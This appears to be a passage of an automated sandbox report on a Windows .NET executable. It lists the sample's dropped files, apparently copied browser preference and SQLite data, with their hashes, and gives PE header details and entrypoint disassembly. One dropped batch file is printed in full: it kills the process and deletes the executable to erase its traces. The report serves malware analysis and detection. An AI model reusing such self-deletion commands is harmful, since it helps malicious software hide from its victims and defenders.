Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER315C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4865
Entropy (8bit):	4.4750399975451325
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsae702I7VFJ5WS2CfjkbPs3rm8M4JgprPFnWY+q8vYprkLb4w5d:uILf/7GySPf7JGWYKBLb4+d
MD5:	7FDDD7D8BD55D0BD61468C9A056AF474
SHA1:	79918F650D410659ECFA34C9704890C68F4A5424
SHA-256:	864B757ADEA094D55162BDF946E3C950B45B86A01788C21E8A4F8263B9F7E366
SHA-512:	FF3ECFBF92AD6E6767B2DB32B156C76244EA6EE26675764F9A58E501F16890F4447BCE4C7617AD041239C5A7B47839B604820059B62757ECFCB97A6AA49404E6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222963045" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Users\user\AppData\Local\Temp\43caou4g.dhw

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	103985
Entropy (8bit):	6.082865991437579
Encrypted:	false
SSDEEP:	1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
MD5:	6DE273C47E7F54F2910BC516F886633B
SHA1:	230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
SHA-256:	89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
SHA-512:	AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
Malicious:	false
Preview:	{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"

C:\Users\user\AppData\Local\Temp\gu1wuocw.yoi

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	15119
Entropy (8bit):	5.63468773874796
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
MD5:	AFC16C019BBEB3904B37576B9179D9CD
SHA1:	DBA86847FFE7AD2E887F1A51FBD464357850488D
SHA-256:	8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
SHA-512:	752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	107
Entropy (8bit):	5.217404720448199
Encrypted:	false
SSDEEP:	3:HFTEOuMJcFKsoGzpM9lwBRZDEXEPONy+WSDWsOwyXsn:yOuMJNGtM9lweonRSDrty8n
MD5:	5CDF35B64F9243BD9B926277073BEAAA
SHA1:	17EB794C6B3CD58606CB46BF5454C1DA7B7914C3
SHA-256:	BF447E80C2B621EB92B13B875BF70680624A7A7461B85AFB5C99FE5CD20E58F6
SHA-512:	C692E36E81B35C45C0EE939B16C4E4960DE0AB1062260EA1ABE9BAF6002ECBFFDED973988730134380459453C132DC1F45191CEE997FB0C9C85B429EC0956C29
Malicious:	false
Preview:	chcp 65001..TaskKill /F /IM 4716..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\7fE6IkvYWf.exe"..

C:\Users\user\AppData\Local\Temp\tmpDC5.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDD5.tmp.tmpdb

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08434615749937499
Encrypted:	false
SSDEEP:	192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
MD5:	93BAA1B7500F3ADB16BE27FCB2E256A8
SHA1:	77CB640557F5F7950B083405B4AEE0573D11D98F
SHA-256:	7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
SHA-512:	C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE15.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	0.7310370201569906
Encrypted:	false
SSDEEP:	96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5:	A802F475CA2D00B16F45FEA728F2247C
SHA1:	AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256:	156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512:	275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE16.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE17.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE18.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE38.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4026573159402624
Encrypted:	false
SSDEEP:	48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
MD5:	F49DFF163167A43F4940B7337A092C07
SHA1:	1A8BAAC92537FA0BD39063D17C3072AD86190CC4
SHA-256:	B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
SHA-512:	BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE39.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE3A.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE3B.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE3C.tmp.dat

Download File

Process:	C:\Users\user\Desktop\7fE6IkvYWf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	2359296
Entropy (8bit):	4.361347146298437
Encrypted:	false
SSDEEP:	49152:BgAhNXBlw3Ak2BGUF5DD0Uag6nSz8a8aO:X
MD5:	A3F6DE198E1AD89032BE80FC64A9B291
SHA1:	81F81B058AFC51BE7C42774CDAF90A7A52A743FB
SHA-256:	B08F4D54AC8AA5FC10D8313F6FD4BEE2D1D83DB5A7701C2CE06DC452A2B0A922
SHA-512:	D152E106F2A365EFB18B26439A3AD4DD17949EF1C1750D7E7370D080CD140E603BF2DF0EA0BBDA898B93BB93E9169B180D77E7F842C591FF88D3C62837586E85
Malicious:	false
Preview:	regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmf.N..G...............................................................................................................................................................................................................................................................................................................................................\..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	4.640468057261968
Encrypted:	false
SSDEEP:	768:3qQyP8n92v+FSj7AbyRlLlPbRyOuiruMsMd8dMwoGY0i5fRFrsJpyG2gKOrndx7F:ad6U9JuiruohRFrsJdNYPrDgyf
MD5:	70D18208E8F809D5D5FA6F647313D25A
SHA1:	63AB45FA3F52AE99D0C30F350858A7A3BBE88823
SHA-256:	F9C96982683BED689368B7D7B2C5EF3C6B5FCD701B133D51F12C265A0A43FD32
SHA-512:	2529DBF47ACD6150B325143D2953194703A7A3FE6C0D27C9746856B90E2515BDA583A2694DBDFEDDD93F9E577DECEF34A7E756C67C14BB580327131A59EE2977
Malicious:	false
Preview:	regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtmf.N..G...............................................................................................................................................................................................................................................................................................................................................\..HvLE..............!.......4...3;1..T.[.......................... .......p...............................P...............................`... ..........................hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.713074023738123
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	7fE6IkvYWf.exe
File size:	827'904 bytes
MD5:	2fe8c93d75210e538aec9062ba29c645
SHA1:	548954a0284ed9dd887fb1d39671289970aa5340
SHA256:	53c6ef3ed4d5b1758da8ed974af09901a9ef9d9c7e77e2af7b5194cd8214b4f9
SHA512:	089d69ac48af9e77209db87c28719b6567fa8f43375e4f6a6bc9f30bf3a7a3a86e249f1eab2cb231d5f7b613db63f6b442aa5f913ca7df1dba34b62e17f3f8fb
SSDEEP:	12288:VZkAFJWTLQNWdHSMMsar67G2AB6xUPXVyhXXv3eeDJ+qgTvuYpiebJB7FEnjd1ib:UAFlNWdH2qYLMPue1S2YhbTFggJfvJ
TLSH:	4505F1CCABD889A2DECD437A542340089BB6B49DE053F76F652CF6F53B87B50940C46A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}............"...0..............~... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4d7e1c
Entrypoint Section:	.>h"
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x96EB7DA4 [Sun Mar 27 17:38:44 2050 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004B0000h]
sub ebx, dword ptr [eax]
xchg eax, edx
adc dl, byte ptr [ebx]
inc esi
mov ah, 4Ch
xchg eax, edi
pushfd
inc esi
mov ah, F3h
fsubr dword ptr [edx-36h]
pop esp
pop ebp
inc esi
mov ah, 6Fh
dec eax
jnle 00007FDF14BBE884h
test eax, 64726EFFh
jp 00007FDF14BBE936h
inc edx
in al, BAh
xchg eax, ebp
mov edx, 462B2AAEh
dec ebx
dec ebx
fldcw word ptr [ecx+59h]
jo 00007FDF14BBE933h
xchg eax, edx
sbb eax, EA45E59Bh
jnc 00007FDF14BBE941h
dec esi
inc ebp
jnbe 00007FDF14BBE925h
movups xmm6, xmm4
out F8h, al
jl 00007FDF14BBE96Ch
fidiv dword ptr [edi+02968215h]
add edi, dword ptr [eax+46h]
retf
push esi
retf BEA2h
call 00007FDF5B34C0CBh
mov ecx, 89C1C046h
shr dl, 00000066h
js 00007FDF14BBE881h
nop
scasd
mov al, byte ptr [3B1155FEh]
les esp, fword ptr [ecx+7Bh]
sal byte ptr [577258F2h], 00000035h
fldenv [eax]
out dx, al
jle 0000E942h
pop edi
add ah, cl
jp 00007FDF14BBE966h
jle 00007FDF14BBE943h
pop esp
dec eax
mov bl, 92h
test byte ptr [esi-4Ch], al
clc
push eax
inc esi
mov ah, 4Eh
push ecx
inc esi
mov ah, 88h
add eax, dword ptr [edx]
inc esi
mov ah, 4Fh
or dh, byte ptr [esi]
aaa
inc esi
mov ah, 4Ch
push ebx
pop esi
inc esi
mov ah, D8h
js 00007FDF14BBE958h
loop 00007FDF14BBE8D5h
inc esi
mov ah, 4Bh
mov eax, dword ptr [B4463233h]
dec ebx
or eax, FCB4460Dh
jnle 00007FDF14BBE8A9h
adc cl, byte ptr [eax-4BB9E3E1h]
dec edx
dec eax
inc edi
inc esi
mov dh, 77h
or ecx, dword ptr [edi+0000448Eh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xda36c	0x28	.>h"
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17c000	0x150c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb0000	0x8	.+,2
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x1529e0	0x48	.>h"
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2a1a0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.4Ul	0x2e000	0x80373	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.+,2	0xb0000	0x8	0x200	7b2127466fcc36e6f104042cdc5b1ff3	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.>h"	0xb2000	0xc8234	0xc8400	557a51851cca6203bad924f7e691fb9e	False	0.850406718164794	data	7.724583620670912	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x17c000	0x150c	0x1600	dee37e2342a92edd211af1746a9f9076	False	0.3915127840909091	data	5.416449102146167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17e000	0xc	0x200	09bed758fca835a75b3b2182686c6e85	False	0.048828125	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x17c090	0x340	data			0.45072115384615385
